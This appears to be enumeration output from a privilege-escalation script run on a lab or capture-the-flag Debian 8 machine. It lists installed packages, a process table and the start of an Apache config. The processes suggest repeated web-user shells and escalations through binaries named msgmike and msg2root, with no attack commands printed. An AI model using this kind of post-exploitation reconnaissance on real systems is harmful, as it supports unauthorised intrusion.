libgcc1:i386 1:4.9.2-10 GCC support library
libgcrypt20:i386 1.6.3-2+deb8u1 LGPL Crypto library - runtime library
libgdbm3:i386 1.8.3-13.1 GNU dbm database routines (runtime version)
libgdk-pixbuf2.0-0:i386 2.31.1-2+deb8u4 GDK Pixbuf library
libgdk-pixbuf2.0-common 2.31.1-2+deb8u4 GDK Pixbuf library - data files
libgeoip1:i386 1.6.2-4 non-DNS IP-to-country resolver library
libglib2.0-0:i386 2.42.1-1 GLib library of C routines
libglib2.0-data 2.42.1-1 Common files for GLib library
libgmp10:i386 2:6.0.0+dfsg-6 Multiprecision arithmetic library
libgnutls-deb0-28:i386 3.3.8-6+deb8u3 GNU TLS library - main runtime library
libgnutls-openssl27:i386 3.3.8-6+deb8u3 GNU TLS library - OpenSSL wrapper
libgomp1:i386 4.9.2-10 GCC OpenMP (GOMP) support library
libgpg-error0:i386 1.17-3 library for common error values and messages in GnuPG components
libgpgme11:i386 1.5.1-6 GPGME - GnuPG Made Easy (library)
libgpm2:i386 1.20.4-6.1+b2 General Purpose Mouse - shared library
libgraphite2-3:i386 1.3.6-1~deb8u1 Font rendering engine for Complex Scripts -- library
libgssapi-krb5-2:i386 1.12.1+dfsg-19+deb8u2 MIT Kerberos runtime libraries - krb5 GSS-API Mechanism
libgtk2.0-0:i386 2.24.25-3 GTK+ graphical user interface library
libgtk2.0-bin 2.24.25-3 programs for the GTK+ graphical user interface library
libgtk2.0-common 2.24.25-3 common files for the GTK+ graphical user interface library
libharfbuzz0b:i386 0.9.35-2 OpenType text shaping engine (shared library)
libhogweed2:i386 2.7.1-5 low level cryptographic library (public-key cryptos)
libhtml-form-perl 6.03-1 module that represents an HTML form element
libhtml-format-perl 2.11-1 module for transforming HTML into various formats
libhtml-parser-perl 3.71-1+b3 collection of modules that parse HTML text documents
libhtml-tagset-perl 3.20-2 Data tables pertaining to HTML
libhtml-template-perl 2.95-1 module for using HTML templates with Perl
libhtml-tree-perl 5.03-1 Perl module to represent and create HTML syntax trees
libhttp-cookies-perl 6.01-1 HTTP cookie jars
libhttp-daemon-perl 6.01-1 simple http server class
libhttp-date-perl 6.02-1 module of date conversion routines
libhttp-message-perl 6.06-1 perl interface to HTTP style messages
libhttp-negotiate-perl 6.00-2 implementation of content negotiation
libicu52:i386 52.1-8+deb8u3 International Components for Unicode
libidn11:i386 1.29-1+b2 GNU Libidn library, implementation of IETF IDN specifications
libintl-perl 1.23-1 Uniforum message translations system compatible i18n library
libio-html-perl 1.001-1 open an HTML file with automatic charset detection
libio-socket-ip-perl 0.32-1 module for using IPv4 and IPv6 sockets in a protocol-independent way
libio-socket-ssl-perl 2.002-2+deb8u1 Perl module implementing object oriented interface to SSL sockets
libio-string-perl 1.08-3 Emulate IO::File interface for in-core strings
libirs-export91 1:9.9.5.dfsg-9+deb8u6 Exported IRS Shared Library
libisc-export95 1:9.9.5.dfsg-9+deb8u6 Exported ISC Shared Library
libisc95 1:9.9.5.dfsg-9+deb8u6 ISC Shared Library used by BIND
libisccc90 1:9.9.5.dfsg-9+deb8u6 Command Channel Library used by BIND
libisccfg-export90 1:9.9.5.dfsg-9+deb8u6 Exported ISC CFG Shared Library
libisccfg90 1:9.9.5.dfsg-9+deb8u6 Config File Handling Library used by BIND
libisl10:i386 0.12.2-2 manipulating sets and relations of integer points bounded by linear constraints
libitm1:i386 4.9.2-10 GNU Transactional Memory Library
libjasper1:i386 1.900.1-debian1-2.4+deb8u1 JasPer JPEG-2000 runtime library
libjbig0:i386 2.1-3.1 JBIGkit libraries
libjpeg62-turbo:i386 1:1.3.1-12 libjpeg-turbo JPEG runtime library
libjson-c2:i386 0.11-4 JSON manipulation library - shared library
libk5crypto3:i386 1.12.1+dfsg-19+deb8u2 MIT Kerberos runtime libraries - Crypto Library
libkeyutils1:i386 1.5.9-5+b1 Linux Key Management Utilities (library)
libklibc 2.0.4-2 minimal libc subset for use with initramfs
libkmod2:i386 18-3 libkmod shared library
libkrb5-3:i386 1.12.1+dfsg-19+deb8u2 MIT Kerberos runtime libraries
libkrb5support0:i386 1.12.1+dfsg-19+deb8u2 MIT Kerberos runtime libraries - Support library
libksba8:i386 1.3.2-1 X.509 and CMS support library
liblcms2-2:i386 2.6-3+b3 Little CMS 2 color management library
libldap-2.4-2:i386 2.4.40+dfsg-1+deb8u2 OpenLDAP libraries
liblocale-gettext-perl 1.05-8+b1 module using libc functions for internationalization in Perl
liblockfile-bin 1.09-6 support binaries for and cli utilities based on liblockfile
liblockfile1:i386 1.09-6 NFS-safe locking library
liblog-message-perl 0.8-1 powerful and flexible message logging mechanism
liblog-message-simple-perl 0.10-2 simplified interface to Log::Message
liblogging-stdlog0:i386 1.0.4-1 easy to use and lightweight logging library
liblognorm1:i386 1.0.1-3 Log normalizing library
liblua5.1-0:i386 5.1.5-7.1 Shared library for the Lua interpreter version 5.1
liblwp-mediatypes-perl 6.02-1 module to guess media type for a file or a URL
liblwp-protocol-https-perl 6.06-2 HTTPS driver for LWP::UserAgent
liblwres90 1:9.9.5.dfsg-9+deb8u6 Lightweight Resolver Library used by BIND
liblzma5:i386 5.1.1alpha+20120614-2+b3 XZ-format compression library
libmagic1:i386 1:5.22+15-2+deb8u1 File type determination library using "magic" numbers
libmailtools-perl 2.13-1 Manipulate email in perl programs
libmnl0:i386 1.0.3-5 minimalistic Netlink communication library
libmodule-build-perl 0.421000-2 framework for building and installing Perl modules
libmodule-pluggable-perl 5.1-1 module for giving modules the ability to have plugins
libmodule-signature-perl 0.73-1+deb8u2 module to manipulate CPAN SIGNATURE files
libmount1:i386 2.25.2-6 device mounting library
libmpc3:i386 1.0.2-1 multiple precision complex floating-point library
libmpfr4:i386 3.1.2-2 multiple precision floating-point computation
libmro-compat-perl 0.12-1 mro::* interface compatibility for Perls < 5.9.5
libmysqlclient18:i386 5.5.47-0+deb8u1 MySQL database client library
libncurses5:i386 5.9+20140913-1+b1 shared libraries for terminal handling
libncursesw5:i386 5.9+20140913-1+b1 shared libraries for terminal handling (wide character support)
libnet-http-perl 6.07-1 module providing low-level HTTP connection client
libnet-smtp-ssl-perl 1.01-3 Perl module providing SSL support to Net::SMTP
libnet-ssleay-perl 1.65-1+b1 Perl module for Secure Sockets Layer (SSL)
libnetfilter-acct1:i386 1.0.2-1.1 Netfilter acct library
libnettle4:i386 2.7.1-5 low level cryptographic library (symmetric and one-way cryptos)
libnewt0.52:i386 0.52.17-1+b1 Not Erik's Windowing Toolkit - text mode windowing with slang
libnfnetlink0:i386 1.0.1-3 Netfilter netlink library
libnfsidmap2:i386 0.25-5 NFS idmapping library
libonig2:i386 5.9.5-3.2 Oniguruma regular expressions library
libp11-kit0:i386 0.20.7-1 Library for loading and coordinating access to PKCS#11 modules - runtime
libpackage-constants-perl 0.04-1 List constants defined in a package
libpam-modules:i386 1.1.8-3.1+deb8u1 Pluggable Authentication Modules for PAM
libpam-modules-bin 1.1.8-3.1+deb8u1 Pluggable Authentication Modules for PAM - helper binaries
libpam-runtime 1.1.8-3.1+deb8u1 Runtime support for the PAM library
libpam0g:i386 1.1.8-3.1+deb8u1 Pluggable Authentication Modules library
libpango-1.0-0:i386 1.36.8-3 Layout and rendering of internationalized text
libpangocairo-1.0-0:i386 1.36.8-3 Layout and rendering of internationalized text
libpangoft2-1.0-0:i386 1.36.8-3 Layout and rendering of internationalized text
libpaper-utils 1.1.24+nmu4 library for handling paper characteristics (utilities)
libpaper1:i386 1.1.24+nmu4 library for handling paper characteristics
libparams-util-perl 1.07-2+b1 Perl extension for simple stand-alone param checking functions
libparse-debianchangelog-perl 1.2.0-1.1 parse Debian changelogs and output them in other formats
libpci3:i386 1:3.2.1-3 Linux PCI Utilities (shared library)
libpcre3:i386 2:8.35-3.3+deb8u2 Perl 5 Compatible Regular Expression Library - runtime files
libperl4-corelibs-perl 0.003-1 libraries historically supplied with Perl 4
libpipeline1:i386 1.4.0-1 pipeline manipulation library
libpixman-1-0:i386 0.32.6-3 pixel-manipulation library for X and cairo
libpng12-0:i386 1.2.50-2+deb8u2 PNG library - runtime
libpod-latex-perl 0.61-1 module to convert Pod data to formatted LaTeX
libpod-readme-perl 0.11-1 Perl module to convert POD to README file
libpopt0:i386 1.16-10 lib for parsing cmdline parameters
libprocps3:i386 2:3.3.9-9 library for accessing process information from /proc
libpsl0:i386 0.5.1-1 Library for Public Suffix List (shared libraries)
libpth20:i386 2.0.7-20 GNU Portable Threads
libpython-stdlib:i386 2.7.9-1 interactive high-level object-oriented language (default python version)
libpython2.7-minimal:i386 2.7.9-2 Minimal subset of the Python language (version 2.7)
libpython2.7-stdlib:i386 2.7.9-2 Interactive high-level object-oriented language (standard library, version 2.7)
libqdbm14 1.8.78-5+b1 QDBM Database Libraries without GDBM wrapper[runtime]
libquadmath0:i386 4.9.2-10 GCC Quad-Precision Math Library
libreadline6:i386 6.3-8+b3 GNU readline and history libraries, run-time libraries
libregexp-common-perl 2013031301-1 module with common regular expressions
librtmp1:i386 2.4+20150115.gita107cef-1 toolkit for RTMP streams (shared library)
libsasl2-2:i386 2.1.26.dfsg1-13+deb8u1 Cyrus SASL - authentication abstraction library
libsasl2-modules:i386 2.1.26.dfsg1-13+deb8u1 Cyrus SASL - pluggable authentication modules
libsasl2-modules-db:i386 2.1.26.dfsg1-13+deb8u1 Cyrus SASL - pluggable authentication modules (DB)
libselinux1:i386 2.3-2 SELinux runtime shared libraries
libsemanage-common 2.3-1 Common files for SELinux policy management libraries
libsemanage1:i386 2.3-1+b1 SELinux policy management library
libsepol1:i386 2.3-2 SELinux library for manipulating binary security policies
libsigc++-2.0-0c2a:i386 2.4.0-1 type-safe Signal Framework for C++ - runtime
libsigsegv2:i386 2.10-4+b1 Library for handling page faults in a portable way
libslang2:i386 2.3.0-2 S-Lang programming library - runtime version
libsmartcols1:i386 2.25.2-6 smart column output alignment library
libsoftware-license-perl 0.103010-3 module providing templated software licenses
libsqlite3-0:i386 3.8.7.1-1+deb8u1 SQLite 3 shared library
libss2:i386 1.42.12-1.1 command-line interface parsing library
libssh2-1:i386 1.4.3-4.1+deb8u1 SSH2 client-side library
libssl1.0.0:i386 1.0.1k-3+deb8u4 Secure Sockets Layer toolkit - shared libraries
libstdc++6:i386 4.9.2-10 GNU Standard C++ Library v3
libsub-exporter-perl 0.986-1 sophisticated exporter for custom-built routines
libsub-install-perl 0.928-1 module for installing subroutines into packages easily
libsub-name-perl 0.12-1 module for assigning a new name to referenced sub
libswitch-perl 2.17-2 switch statement for Perl
libsystemd0:i386 215-17+deb8u3 systemd utility library
libtasn1-6:i386 4.2-3+deb8u1 Manage ASN.1 structures (runtime)
libterm-readkey-perl 2.32-1+b1 perl module for simple terminal control
libterm-ui-perl 0.42-1 Term::ReadLine UI made easy
libtext-charwidth-perl 0.04-7+b3 get display widths of characters on the terminal
libtext-iconv-perl 1.7-5+b2 converts between character sets in Perl
libtext-soundex-perl 3.4-1+b2 implementation of the soundex algorithm
libtext-template-perl 1.46-1 perl module to process text templates
libtext-unidecode-perl 1.22-1 Text::Unidecode -- US-ASCII transliterations of Unicode text
libtext-wrapi18n-perl 0.06-7 internationalized substitute of Text::Wrap
libthai-data 0.1.21-1 Data files for Thai language support library
libthai0:i386 0.1.21-1 Thai language support library
libtiff5:i386 4.0.3-12.3+deb8u1 Tag Image File Format (TIFF) library
libtimedate-perl 2.3000-2 collection of modules to manipulate date/time information
libtinfo5:i386 5.9+20140913-1+b1 shared low-level terminfo library for terminal handling
libtirpc1:i386 0.2.5-1 transport-independent RPC library
libtokyocabinet9:i386 1.4.48-3 Tokyo Cabinet Database Libraries [runtime]
libubsan0:i386 4.9.2-10 UBSan -- undefined behaviour sanitizer (runtime)
libudev1:i386 215-17+deb8u3 libudev shared library
liburi-perl 1.64-1 module to manipulate and access URI strings
libusb-0.1-4:i386 2:0.1.12-25 userspace USB programming library
libusb-1.0-0:i386 2:1.0.19-1 userspace USB programming library
libustr-1.0-1:i386 1.0.4-3+b2 Micro string library: shared library
libuuid-perl 0.05-1+b1 Perl extension for using UUID interfaces as defined in e2fsprogs
libuuid1:i386 2.25.2-6 Universally Unique ID library
libwebp5:i386 0.4.1-1.2+b2 Lossy compression of digital photographic images.
libwebpdemux1:i386 0.4.1-1.2+b2 Lossy compression of digital photographic images.
libwebpmux1:i386 0.4.1-1.2+b2 Lossy compression of digital photographic images.
libwrap0:i386 7.6.q-25 Wietse Venema's TCP wrappers library
libwww-perl 6.08-1 simple and consistent interface to the world-wide web
libwww-robotrules-perl 6.01-1 database of robots.txt-derived permissions
libx11-6:i386 2:1.6.2-3 X11 client-side library
libx11-data 2:1.6.2-3 X11 client-side library
libxapian22 1.2.19-1 Search engine library
libxau6:i386 1:1.0.8-1 X11 authorisation library
libxcb-render0:i386 1.10-3+b1 X C Binding, render extension
libxcb-shm0:i386 1.10-3+b1 X C Binding, shm extension
libxcb1:i386 1.10-3+b1 X C Binding
libxcomposite1:i386 1:0.4.4-1 X11 Composite extension library
libxcursor1:i386 1:1.1.14-1+b1 X cursor management library
libxdamage1:i386 1:1.1.4-2+b1 X11 damaged region extension library
libxdmcp6:i386 1:1.1.1-1+b1 X11 Display Manager Control Protocol library
libxext6:i386 2:1.3.3-1 X11 miscellaneous extension library
libxfixes3:i386 1:5.0.1-2+b2 X11 miscellaneous 'fixes' extension library
libxi6:i386 2:1.7.4-1+b2 X11 Input extension library
libxinerama1:i386 2:1.1.3-1+b1 X11 Xinerama extension library
libxml-libxml-perl 2.0116+dfsg-1+deb8u1 Perl interface to the libxml2 library
libxml-namespacesupport-perl 1.11-1 Perl module for supporting simple generic namespaces
libxml-parser-perl 2.41-3 Perl module for parsing XML files
libxml-sax-base-perl 1.07-1 base class for SAX drivers and filters
libxml-sax-expat-perl 0.40-2 Perl module for a SAX2 driver for Expat (XML::Parser)
libxml-sax-perl 0.99+dfsg-2 Perl module for using and building Perl SAX2 XML processors
libxml2:i386 2.9.1+dfsg1-5+deb8u1 GNOME XML library
libxmuu1:i386 2:1.1.2-1 X11 miscellaneous micro-utility library
libxrandr2:i386 2:1.4.2-1+b1 X11 RandR extension library
libxrender1:i386 1:0.9.8-1+b1 X Rendering Extension client library
libxtables10 1.4.21-2+b1 netfilter xtables library
linux-base 3.5 Linux image base package
linux-image-3.16.0-4-686-pae 3.16.7-ckt20-1+deb8u4 Linux 3.16 for modern PCs
linux-image-686-pae 3.16+63 Linux for modern PCs (meta-package)
linux-libc-dev:i386 3.16.7-ckt20-1+deb8u4 Linux support headers for userspace development
locales 2.19-18+deb8u3 GNU C Library: National Language (locale) data [support]
login 1:4.2-3+deb8u1 system login tools
logrotate 3.8.7-1+b1 Log rotation utility
lsb-base 4.1+Debian13+nmu1 Linux Standard Base 4.1 init script functionality
lsb-release 4.1+Debian13+nmu1 Linux Standard Base version reporting utility
lsof 4.86+dfsg-1 Utility to list open files
m4 1.4.17-4 macro processing language
man-db 2.7.0.2-5 on-line manual pager
manpages 3.74-1 Manual pages about using a GNU/Linux system
manpages-dev 3.74-1 Manual pages about using GNU/Linux for development
mawk 1.3.3-17 a pattern scanning and text processing language
mime-support 3.58 MIME files 'mime.types' & 'mailcap', and support programs
mlocate 0.26-1 quickly find files on the filesystem based on their name
mount 2.25.2-6 Tools for mounting and manipulating filesystems
multiarch-support 2.19-18+deb8u3 Transitional package to ensure multiarch compatibility
mutt 1.5.23-3 text-based mailreader supporting MIME, GPG, PGP and threading
mysql-client 5.5.47-0+deb8u1 MySQL database client (metapackage depending on the latest version)
mysql-client-5.5 5.5.47-0+deb8u1 MySQL database client binaries
mysql-common 5.5.47-0+deb8u1 MySQL database common files, e.g. /etc/mysql/my.cnf
mysql-server 5.5.47-0+deb8u1 MySQL database server (metapackage depending on the latest version)
mysql-server-5.5 5.5.47-0+deb8u1 MySQL database server binaries and system database setup
mysql-server-core-5.5 5.5.47-0+deb8u1 MySQL database server binaries
nano 2.2.6-3 small, friendly text editor inspired by Pico
ncurses-base 5.9+20140913-1 basic terminal type definitions
ncurses-bin 5.9+20140913-1+b1 terminal-related programs and man pages
ncurses-term 5.9+20140913-1 additional terminal type definitions
net-tools 1.60-26+b1 NET-3 networking toolkit
netbase 5.3 Basic TCP/IP networking system
netcat-traditional 1.10-41 TCP/IP swiss army knife
nfacct 1.0.1-1.1 netfilter accounting object tool
nfs-common 1:1.2.8-9 NFS support files common to client and server
openssh-client 1:6.7p1-5+deb8u1 secure shell (SSH) client, for secure access to remote machines
openssl 1.0.1k-3+deb8u4 Secure Sockets Layer toolkit - cryptographic utility
os-prober 1.65 utility to detect other OSes on a set of drives
passwd 1:4.2-3+deb8u1 change and administer password and group data
patch 2.7.5-1 Apply a diff file to an original
pciutils 1:3.2.1-3 Linux PCI Utilities
perl 5.20.2-3+deb8u4 Larry Wall's Practical Extraction and Report Language
perl-base 5.20.2-3+deb8u4 minimal Perl system
perl-modules 5.20.2-3+deb8u4 Core Perl modules
php5 5.6.17+dfsg-0+deb8u1 server-side, HTML-embedded scripting language (metapackage)
php5-cli 5.6.17+dfsg-0+deb8u1 command-line interpreter for the php5 scripting language
php5-common 5.6.17+dfsg-0+deb8u1 Common files for packages built from the php5 source
php5-json 1.3.6-1 JSON module for php5
php5-mysql 5.6.17+dfsg-0+deb8u1 MySQL module for php5
php5-readline 5.6.17+dfsg-0+deb8u1 Readline module for php5
pinentry-gtk2 0.8.3-2 GTK+-2-based PIN or pass-phrase entry dialog for GnuPG
procmail 3.22-24 Versatile e-mail processor
procps 2:3.3.9-9 /proc file system utilities
psmisc 22.21-2 utilities that use the proc file system
python 2.7.9-1 interactive high-level object-oriented language (default version)
python-apt 0.9.3.12 Python interface to libapt-pkg
python-apt-common 0.9.3.12 Python interface to libapt-pkg (locales)
python-chardet 2.3.0-1 universal character encoding detector for Python2
python-debian 0.1.27 Python modules to work with Debian-related data formats
python-debianbts 1.12 Python interface to Debian's Bug Tracking System
python-defusedxml 0.4.1-2 XML bomb protection for Python stdlib modules (for Python 2)
python-docutils 0.12+dfsg-1 text processing system for reStructuredText (implemented in Python 2)
python-minimal 2.7.9-1 minimal subset of the Python language (default version)
python-pil:i386 2.6.1-2+deb8u2 Python Imaging Library (Pillow fork)
python-pkg-resources 5.5.1-1 Package Discovery and Resource Access using pkg_resources
python-pygments 2.0.1+dfsg-1.1+deb8u1 syntax highlighting package written in Python
python-reportbug 6.6.3 Python modules for interacting with bug tracking systems
python-roman 2.0.0-1 module for generating/analyzing Roman numerals for Python 2
python-six 1.8.0-1 Python 2 and 3 compatibility library (Python 2 interface)
python-soappy 0.12.22-1 SOAP Support for Python
python-support 1.0.15 automated rebuilding support for Python modules
python-wstools 0.4.3-2 WSDL parsing tools Python module
python2.7 2.7.9-2 Interactive high-level object-oriented language (version 2.7)
python2.7-minimal 2.7.9-2 Minimal subset of the Python language (version 2.7)
readline-common 6.3-8 GNU readline and history libraries, common files
rename 0.20-3 Perl extension for renaming multiple files
reportbug 6.6.3 reports bugs in the Debian distribution
rpcbind 0.2.1-6+deb8u1 converts RPC program numbers into universal addresses
rsyslog 8.4.2-1+deb8u2 reliable system and kernel logging daemon
sed 4.2.2-4+b1 The GNU sed stream editor
sensible-utils 0.0.9 Utilities for sensible alternative selection
sgml-base 1.26+nmu4 SGML infrastructure and SGML catalog file support
shared-mime-info 1.3-1 FreeDesktop.org shared MIME database and spec
ssl-cert 1.0.35 simple debconf wrapper for OpenSSL
startpar 0.59-3 run processes in parallel and multiplex their output
systemd 215-17+deb8u3 system and service manager
systemd-sysv 215-17+deb8u3 system and service manager - SysV links
sysv-rc 2.88dsf-59 System-V-like runlevel change mechanism
sysvinit-utils 2.88dsf-59 System-V-like utilities
tar 1.27.1-2+b1 GNU version of the tar archiving utility
task-english 3.31+deb8u1 General English environment
tasksel 3.31+deb8u1 tool for selecting tasks for installation on Debian systems
tasksel-data 3.31+deb8u1 official tasks used for installation of Debian systems
tcpd 7.6.q-25 Wietse Venema's TCP wrapper utilities
telnet 0.17-36 The telnet client
texinfo 5.2.0.dfsg.1-6 Documentation system for on-line information and printed output
time 1.7-25 GNU time program for measuring CPU resource usage
traceroute 1:2.0.20-2+b1 Traces the route taken by packets over an IPv4/IPv6 network
tzdata 2015g-0+deb8u1 time zone and daylight-saving time data
ucf 3.0030 Update Configuration File(s): preserve user changes to config files
udev 215-17+deb8u3 /dev/ and hotplug management daemon
usbutils 1:007-2 Linux USB utilities
util-linux 2.25.2-6 Miscellaneous system utilities
util-linux-locales 2.25.2-6 Locales files for util-linux
vim-common 2:7.4.488-7 Vi IMproved - Common files
vim-tiny 2:7.4.488-7 Vi IMproved - enhanced vi editor - compact version
w3m 0.5.3-19 WWW browsable pager with excellent tables/frames support
wamerican 7.1-1 American English dictionary words for /usr/share/dict
wget 1.16-1 retrieves files from the web
whiptail 0.52.17-1+b1 Displays user-friendly dialog boxes from shell scripts
whois 5.2.7 intelligent WHOIS client
xauth 1:1.0.9-1 X authentication utility
xdg-user-dirs 0.15-2 tool to manage well known user directories
xkb-data 2.12-1 X Keyboard Extension (XKB) configuration data
xml-core 0.13+nmu2 XML infrastructure and XML catalog file support
xz-utils 5.1.1alpha+20120614-2+b3 XZ-format compression utilities
zlib1g:i386 1:1.2.8.dfsg-2+b1 compression library - runtime
[+] Current processes
USER PID START TIME COMMAND
root 1 Oct04 0:01 /sbin/init
root 2 Oct04 0:00 [kthreadd]
root 3 Oct04 1:10 [ksoftirqd/0]
root 5 Oct04 0:00 [kworker/0:0H]
root 7 Oct04 0:05 [rcu_sched]
root 8 Oct04 0:00 [rcu_bh]
root 9 Oct04 0:00 [migration/0]
root 10 Oct04 0:04 [watchdog/0]
root 11 Oct04 0:00 [khelper]
root 12 Oct04 0:00 [kdevtmpfs]
root 13 Oct04 0:00 [netns]
root 14 Oct04 0:00 [khungtaskd]
root 15 Oct04 0:00 [writeback]
root 16 Oct04 0:00 [ksmd]
root 17 Oct04 0:00 [crypto]
root 18 Oct04 0:00 [kintegrityd]
root 19 Oct04 0:00 [bioset]
root 20 Oct04 0:00 [kblockd]
root 22 Oct04 0:00 [kswapd0]
root 23 Oct04 0:00 [fsnotify_mark]
root 29 Oct04 0:00 [kthrotld]
root 30 Oct04 0:00 [ipv6_addrconf]
root 31 Oct04 0:00 [deferwq]
root 66 Oct04 0:00 [khubd]
root 67 Oct04 0:00 [mpt_poll_0]
root 68 Oct04 0:00 [mpt/0]
root 69 Oct04 0:00 [scsi_eh_0]
root 70 Oct04 0:00 [scsi_tmf_0]
root 71 Oct04 0:15 [kworker/u2:2]
root 74 Oct04 0:00 [kworker/0:1H]
root 95 Oct04 0:00 [jbd2/sda1-8]
root 96 Oct04 0:00 [ext4-rsv-conver]
root 126 Oct04 0:00 [kauditd]
root 127 Oct04 0:00 /lib/systemd/systemd-journald
root 136 Oct04 0:00 /lib/systemd/systemd-udevd
root 169 Oct04 0:00 [kpsmoused]
root 222 Oct04 0:00 [kworker/0:4]
root 344 Oct04 0:00 /sbin/rpcbind
statd 368 Oct04 0:00 /sbin/rpc.statd
root 373 Oct04 0:00 [rpciod]
root 375 Oct04 0:00 [nfsiod]
root 382 Oct04 0:00 /usr/sbin/rpc.idmapd
root 383 Oct04 0:00 /usr/sbin/cron
daemon 384 Oct04 0:00 /usr/sbin/atd
root 386 Oct04 0:00 /lib/systemd/systemd-logind
message+ 389 Oct04 0:00 /usr/bin/dbus-daemon
root 407 Oct04 0:00 /usr/sbin/rsyslogd
root 409 Oct04 0:00 /usr/sbin/acpid
root 419 Oct04 0:00 /sbin/agetty
root 441 Oct04 0:00 /bin/sh
root 482 Oct04 0:12 /usr/sbin/apache2
www-data 650 Oct04 0:40 /usr/sbin/apache2
www-data 651 Oct04 0:50 /usr/sbin/apache2
www-data 652 Oct04 0:40 /usr/sbin/apache2
www-data 653 Oct04 0:47 /usr/sbin/apache2
mysql 790 Oct04 1:11 /usr/sbin/mysqld
www-data 1125 Oct04 0:00 /bin/sh
www-data 1126 Oct04 0:00 python
www-data 1127 Oct04 0:00 /bin/bash
Debian-+ 1140 Oct04 0:00 /usr/sbin/exim4
root 1198 Oct04 0:00 dhclient
www-data 1213 Oct04 0:49 /usr/sbin/apache2
root 1244 Oct04 2:15 [kworker/0:0]
www-data 1251 Oct04 0:40 /usr/sbin/apache2
www-data 1253 Oct04 0:39 /usr/sbin/apache2
www-data 1255 Oct04 0:39 /usr/sbin/apache2
www-data 1259 Oct04 0:41 /usr/sbin/apache2
root 1435 Oct04 0:00 procmail
www-data 1436 Oct04 0:00 sh
www-data 1437 Oct04 0:00 /bin/sh
www-data 1438 Oct04 0:00 python
www-data 1439 Oct04 0:00 /bin/bash
root 1517 Oct04 0:00 su
kent 1518 Oct04 0:00 bash
root 1716 Oct04 0:00 su
kane 1717 Oct04 0:00 bash
root 1916 Oct04 0:00 su
kent 1917 Oct04 0:00 bash
root 1923 Oct04 0:00 su
kane 1924 Oct04 0:00 bash
www-data 1938 Oct04 0:00 /usr/sbin/apache2
www-data 1939 Oct04 0:00 /usr/sbin/apache2
root 1968 Oct04 0:00 su
kent 1969 Oct04 0:00 bash
root 1987 Oct04 0:00 su
kane 1988 Oct04 0:00 bash
www-data 2167 Oct04 0:00 /bin/sh
www-data 2168 Oct04 0:00 python
www-data 2169 Oct04 0:00 /bin/bash
root 2170 Oct04 0:00 su
kent 2171 Oct04 0:00 bash
root 2177 Oct04 0:00 su
kane 2178 Oct04 0:00 bash
mike 2195 Oct04 0:00 ./msgmike
mike 2196 Oct04 0:00 sh
mike 2197 Oct04 0:00 /bin/sh
mike 2198 Oct04 0:00 bash
mike 2200 Oct04 0:00 python
mike 2201 Oct04 0:00 /bin/bash
root 2470 Oct04 0:00 ./msg2root
root 2471 Oct04 0:00 sh
mike 2473 Oct04 0:00 bash
mike 2476 Oct04 0:00 python
mike 2477 Oct04 0:00 /bin/bash
www-data 2484 Oct04 0:00 /bin/sh
www-data 2487 Oct04 0:00 python
www-data 2488 Oct04 0:00 /bin/bash
root 2489 Oct04 0:00 su
kane 2490 Oct04 0:00 bash
mike 2500 Oct04 0:00 ./msgmike
mike 2501 Oct04 0:00 sh
mike 2502 Oct04 0:00 /bin/sh
mike 2503 Oct04 0:00 bash
mike 2504 Oct04 0:00 python
mike 2505 Oct04 0:00 /bin/bash
root 2512 Oct04 0:00 ./msg2root
root 2513 Oct04 0:00 sh
mike 2515 Oct04 0:00 /bin/bash
root 2523 Oct04 0:00 ./msg2root
root 2527 Oct04 0:00 sh
root 2529 Oct04 0:00 /bin/sh
www-data 2561 Oct04 0:00 /bin/sh
www-data 2563 Oct04 0:00 python
www-data 2564 Oct04 0:00 /bin/bash
root 2565 Oct04 0:00 su
kane 2566 Oct04 0:00 bash
mike 2574 Oct04 0:00 ./msgmike
mike 2575 Oct04 0:00 sh
mike 2576 Oct04 0:00 /bin/sh
mike 2577 Oct04 0:00 bash
mike 2578 Oct04 0:00 python
mike 2579 Oct04 0:00 /bin/bash
root 2587 Oct04 0:00 ./msg2root
root 2588 Oct04 0:00 sh
mike 2590 Oct04 0:00 bash
mike 2592 Oct04 0:00 python
mike 2593 Oct04 0:00 /bin/bash
www-data 2601 Oct04 0:00 /bin/sh
www-data 2603 Oct04 0:00 python
www-data 2604 Oct04 0:00 /bin/bash
root 2605 Oct04 0:00 su
kane 2606 Oct04 0:00 bash
mike 2611 Oct04 0:00 ./msgmike
mike 2612 Oct04 0:00 sh
mike 2613 Oct04 0:00 /bin/sh
mike 2614 Oct04 0:00 bash
mike 2615 Oct04 0:00 python
mike 2616 Oct04 0:00 /bin/bash
www-data 2665 Oct04 0:00 /bin/sh
www-data 2666 Oct04 0:00 /bin/sh
www-data 2668 Oct04 0:00 python
www-data 2669 Oct04 0:00 /bin/bash
root 2670 Oct04 0:00 su
kane 2671 Oct04 0:00 bash
root 2771 Oct04 0:00 [kworker/u2:0]
www-data 2841 00:16 0:00 [sh]
www-data 2842 00:16 0:00 /bin/sh
www-data 2843 00:16 0:00 python
www-data 2844 00:16 0:00 /bin/bash
root 2848 00:17 0:00 su
kane 2849 00:17 0:00 bash
www-data 2861 00:20 0:00 [sh]
www-data 2862 00:20 0:00 /bin/sh
www-data 2863 00:20 0:00 python
www-data 2864 00:20 0:00 /bin/bash
root 2865 00:20 0:00 su
kane 2866 00:20 0:00 bash
www-data 2874 00:21 0:00 [sh]
www-data 2875 00:21 0:00 /bin/sh
www-data 2876 00:21 0:00 python
www-data 2877 00:21 0:00 /bin/bash
root 2878 00:21 0:00 su
kane 2879 00:21 0:00 bash
www-data 3068 00:22 0:00 sh
www-data 3069 00:22 0:00 /bin/sh
www-data 3070 00:22 0:00 python
www-data 3071 00:22 0:00 /bin/bash
root 3072 00:22 0:00 su
kane 3073 00:23 0:00 bash
kane 3079 00:23 0:00 python
kane 3249 00:23 0:00 /bin/sh
kane 3250 00:23 0:00 ps
kane 3251 00:23 0:00 awk
[+] Apache Version and Modules
[+] Apache Config File
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.4/ for detailed information about
# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
# hints.
#
#
# Summary of how the Apache 2 configuration works in Debian:
# The Apache 2 web server configuration in Debian is quite different to
# upstream's suggested way to configure the web server. This is because Debian's
# default Apache2 installation attempts to make adding and removing modules,
# virtual hosts, and extra configuration directives as flexible as possible, in
# order to make automating the changes and administering the server as easy as
# possible.
# It is split into several files forming the configuration hierarchy outlined
# below, all located in the /etc/apache2/ directory:
#
# /etc/apache2/
# |-- apache2.conf
# | `-- ports.conf
# |-- mods-enabled
# | |-- *.load
# | `-- *.conf
# |-- conf-enabled
# | `-- *.conf
# `-- sites-enabled
# `-- *.conf
#
#
